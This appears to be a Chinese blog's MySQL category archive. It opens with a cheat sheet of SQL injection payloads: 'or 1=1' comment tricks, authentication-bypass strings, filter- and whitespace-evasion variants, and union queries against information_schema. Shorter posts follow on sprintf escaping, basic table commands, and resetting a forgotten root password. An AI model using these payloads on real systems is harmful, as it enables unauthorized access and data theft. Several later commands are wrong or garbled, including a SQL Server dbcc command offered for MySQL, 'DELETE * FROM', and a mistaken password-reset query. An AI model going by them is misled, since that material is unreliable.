分类目录归档:mysql

一些常用的mysql注入语句

一些mysql注入

Comments
‘ or 1=1#
‘ or 1=1– –
‘ or 1=1/* (MySQL < 5.1)
‘ or 1=1;%00
‘ or 1=1 union select 1,2 as
' or#newline
1='1
' or– -newline
1='1
' /*!50000or*/1='1
' /*!or*/1='1
?
Prefixes
+ – ~ !
‘ or –+2=- -!!!’2
?
Operators
^, =, !=, %, /, *, &, &&, |, ||, , >>, <=, <=, ,, XOR, DIV, LIKE, SOUNDS LIKE, RLIKE, REGEXP, LEAST, GREATEST,
CAST, CONVERT, IS, IN, NOT, MATCH, AND, OR, BINARY, BETWEEN, ISNULL
?
Whitespaces
%20 %09 %0a %0b %0c %0d %a0 /**/
‘or+(1)sounds/**/like“1“–%a0-
‘union(select(1),tabe_name,(3)from
information_schema.tables)#
?
Strings with quotes
SELECT ‘a’
SELECT “a”
SELECT n’a’
SELECT b’1100001′
SELECT _binary’1100001′
SELECT x’61′
?
Strings without quotes
‘abc’ = 0×616263
?
Aliases
select pass as alias from users
select pass aliasalias from users
select pass
alias aliasfrom users
?
Typecasting
‘ or true = ’1 # or 1=1
‘ or round(pi(),1)+true+true = version() # or 3.1+1+1 = 5.1
‘ or ’1 # or true
?
Compare operator typecasting
select * from users where ‘a’='b’='c’
select * from users where (‘a’='b’)=’c’
select * from users where (false)=’c’
select * from users where (0)=’c’
select * from users where (0)=0
select * from users where true
select * from users
?
Authentication bypass ‘=’
select * from users where name = ”=”
select * from users where false = ”
select * from users where 0 = 0
select * from users where true
select * from users
?
Authentication bypass ‘-’
select * from users where name = ”-”
select * from users where name = 0-0
select * from users where 0 = 0
select * from users where true
select * from users
?
Function filter
?
General function filtering
ascii (97)
load_file/*foo*/(0×616263)
?
Strings with functions
‘abc’ = unhex(616263)
‘abc’ = char(97,98,99)
hex(‘a’) = 61
ascii(‘a’) = 97
ord(‘a’) = 97
‘ABC’ = concat(conv(10,10,36),conv(11,10,36),conv(12,10,36))
?
Strings extracted from gadgets
collation(\N) // binary
collation(user()) // utf8_general_ci
@@time_format // %H:%i:%s
@@binlog_format // MIXED
@@version_comment // MySQL Community Server (GPL)
dayname(from_days(401)) // Monday
dayname(from_days(403)) // Wednesday
monthname(from_days(690)) // November
monthname(from_unixtime(1)) // January
collation(convert((1)using/**/koi8r)) // koi8r_general_ci
(select(collation_name)from(information_schema.collations)where(id)=2) // latin2_czech_cs
?
Special characters extracted from gadgets
aes_encrypt(1,12) // 4?h±{?”^c×Hé?Ea
des_encrypt(1,2) // ?G?/??k
@@ft_boolean_syntax // + -><()~*:""&|
@@date_format // %Y-%m-%d
@@innodb_log_group_home_dir // .\
?
Integer representations
false: 0
true: 1
true+true: 2
floor(pi()): 3
ceil(pi()): 4
floor(version()): 5
ceil(version()): 6
ceil(pi()+pi()): 7
floor(version()+pi()): 8
floor(pi()*pi()): 9
ceil(pi()*pi()): 10
concat(true,true): 11
ceil(pi()*pi())+true: 11
ceil(pi()+pi()+version()): 12
floor(pi()*pi()+pi()): 13
ceil(pi()*pi()+pi()): 14
ceil(pi()*pi()+version()): 15
floor(pi()*version()): 16
ceil(pi()*version()): 17
ceil(pi()*version())+true: 18
floor((pi()+pi())*pi()): 19
ceil((pi()+pi())*pi()): 20
ceil(ceil(pi())*version()): 21
concat(true+true,true): 21
ceil(pi()*ceil(pi()+pi())): 22
ceil((pi()+ceil(pi()))*pi()): 23
ceil(pi())*ceil(version()): 24
floor(pi()*(version()+pi())): 25
floor(version()*version()): 26
ceil(version()*version()): 27
ceil(pi()*pi()*pi()-pi()): 28
floor(pi()*pi()*floor(pi())): 29
ceil(pi()*pi()*floor(pi())): 30
concat(floor(pi()),false): 30
floor(pi()*pi()*pi()): 31
ceil(pi()*pi()*pi()): 32
ceil(pi()*pi()*pi())+true: 33
ceil(pow(pi(),pi())-pi()): 34
ceil(pi()*pi()*pi()+pi()): 35
floor(pow(pi(),pi())): 36
?
@@new: 0
@@log_bin: 1
?
!pi(): 0
!!pi(): 1
true-~true: 3
log(-cos(pi())): 0
-cos(pi()): 1
coercibility(user()): 3
coercibility(now()): 4
?
minute(now())
hour(now())
day(now())
week(now())
month(now())
year(now())
quarter(now())
year(@@timestamp)
crc32(true)
?
Extract substrings
substr(‘abc’,1,1) = ‘a’
substr(‘abc’ from 1 for 1) = ‘a’
substring(‘abc’,1,1) = ‘a’
substring(‘abc’ from 1 for 1) = ‘a’
mid(‘abc’,1,1) = ‘a’
mid(‘abc’ from 1 for 1) = ‘a’
lpad(‘abc’,1,space(1)) = ‘a’
rpad(‘abc’,1,space(1)) = ‘a’
left(‘abc’,1) = ‘a’
reverse(right(reverse(‘abc’),1)) = ‘a’
insert(insert(‘abc’,1,0,space(0)),2,222,space(0)) = ‘a’
space(0) = trim(version()from(version()))
?
Search substrings
locate(‘a’,'abc’)
position(‘a’,'abc’)
position(‘a’ IN ‘abc’)
instr(‘abc’,'a’)
substring_index(‘ab’,'b’,1)
?
Cut substrings
length(trim(leading ‘a’ FROM ‘abc’))
length(replace(‘abc’, ‘a’, ”))
?
Compare strings
strcmp(‘a’,'a’)
mod(‘a’,'a’)
find_in_set(‘a’,'a’)
field(‘a’,'a’)
count(concat(‘a’,'a’))
?
String length
length()
bit_length()
char_length()
octet_length()
bit_count()
?
String case
ucase
lcase
lower
upper
password(‘a’) != password(‘A’)
old_password(‘a’) != old_password(‘A’)
md5(‘a’) != md5(‘A’)
sha(‘a’) != sha(‘A’)
aes_encrypt(‘a’) != aes_encrypt(‘A’)
des_encrypt(‘a’) != des_encrypt(‘A’)
?
Keyword filter
?
Connected keyword filtering
(0)union(select(table_name),column_name,…
0/**/union/*!50000select*/table_name
foo/**/…
0%a0union%a0select%09group_concat(table_name)….
0′union all select all
table_namefoo frominformation_schema. tables`
?
OR, AND
‘||1=’1
‘&&1=’1
‘=’
‘-’
?
OR, AND, UNION
‘ and (select pass from users limit 1)=’secret
?
OR, AND, UNION, LIMIT
‘ and (select pass from users where id =1)=’a
?
OR, AND, UNION, LIMIT, WHERE
‘ and (select pass from users group by id ha

mysql过滤攻击sprintf这个函数

如果php已经做好 表单过滤。那么在最后的mysql操作数据库的时候最好也做下过滤

sprintf 这个函数 亲们可以试试哦

format 必需。转换格式。
arg1 必需。规定插到 format 字符串中第一个 % 符号处的参数。
arg2 可选。规定插到 format 字符串中第二个 % 符号处的参数。
arg++ 可选。规定插到 format 字符串中第三、四等等 % 符号处的参数

参数 format 是转换的格式,以百分比符号 (“%”) 开始到转换字符结束。下面的可能的 format 值:

  • %% – 返回百分比符号
  • %b – 二进制数
  • %c – 依照 ASCII 值的字符
  • %d – 带符号十进制数
  • %e – 可续计数法(比如 1.5e+3)
  • %u – 无符号十进制数
  • %f – 浮点数(local settings aware)
  • %F – 浮点数(not local settings aware)
  • %o – 八进制数
  • %s – 字符串
  • %x – 十六进制数(小写字母)
  • %X – 十六进制数(大写字母)

arg1, arg2, ++ 等参数将插入到主字符串中的百分号 (%) 符号处。该函数是逐步执行的。在第一个 % 符号中,插入 arg1,在第二个 % 符号处,插入 arg2,依此类推。

mysql建库mysql建表mysql删除表删除库方法

如果win下 tee可以保存mysql命令记录
tee d:\1223.sql tinyint m unsigned zerofill

show databases;
use kuming;
show table;
create database my01 charset utf8;
drop database my1;
set names gbk;

create table stu (
snum int,
sname varchar(10)
)engine myisam charset utf8;

rename table stu to new stu;
drop table stu;

可以在不删除表的情况下删除所有的行。这意味着表的结构、属性和索引都是完整的:
DELETE FROM table_name
或者:
DELETE * FROM table_name

MYSQL删除表的记录后如何使ID从1开始
方法1:
truncate table 你的表名
//这样不但将数据全部删除,而且重新定位自增的字段

方法2:
delete from 你的表名
dbcc checkident(你的表名,reseed,0)
//重新定位自增的字段,让它从1开始

方法3:
如果你要保存你的数据,介绍你第三种方法,by QINYI
用phpmyadmin导出数据库,你在里面会有发现哦
编辑sql文件,将其中的自增下一个id号改好,再导入。MYSQL删除表的记录后如何使ID从1开始

create table class(
-> id int primary key auto_increment,
-> sname varchar(10) not null default ”,
-> gender char(1) not null default ”,
-> company varchar(20) not null default ”,
-> salary decimal(6,2) not null default 0.00,
-> fanbu smallint not null default 0
-> )engine myisam charset utf8;

desc class;
select * from class;
insert into class
(id,sname,gender,company,salary,mealallowance)
valus
(1,’urname’,’F’,’google’,8888.88,100)

insert into class
-> (sname,company,salary)
-> values
-> (‘liubei’,’shu’,9000.88),
-> (‘shuche’,’wu’,9000.77),
-> (‘coco’,’wei’,9888.88);

update class set fanbu=1000;
update class set fanbu=2000 where salary<8000;
delete class;
查看列:desc 表名;
修改表名:alter table t_book rename to bbb;
添加列:alter table 表名 add column 列名 varchar(30);
删除列:alter table 表名 drop column 列名;
修改列名MySQL: alter table bbb change nnnnn hh int;
修改列名SQLServer:exec sp_rename’t_student.name’,’nn’,’column’;
修改列名Oracle:lter table bbb rename column nnnnn to hh int;
修改列属性:alter table t_book modify name varchar(22);
select * from class;
select sname,salary from class where salary>9500;

alter table class add score tinyint unsigned not null default 0;
alter table class add snum smallint(5) zerofill not null default 0;

create table account (
-> id int not null default 0,
-> acc1 float(9,2) not null default 0.00,
-> acc2 decimal(9,2) not null default 0.00
-> )engine myisam charset utf8;
insert into account
-> values
-> (1,1234567.23,1234567.23);

win下如果mysql忘记密码了怎么办呢?

如果在win系统下忘记mysql root密码

忘记mysql数据库密码 忘记mysql密码

先停止mysql服务(在cmd命令行下以管理员身份运行)使用命令:
net stop mysql
使用启动mysql数据库
mysqld –skip-grant-tables 或者 mysqld-nt –skip-grant-tables
新建一个cmd窗口然后输入下面命令
mysql -uroot
update mysql.user set password=password(‘root’) where user=’你的密码’;
flush privileges;

注意 flush privileges;不能少的哦

打开任务管理器,停止mysql,mysqld进程,使用
net start mysql启动mysqld服务,
就可以使用root用户 root密码进入数据库了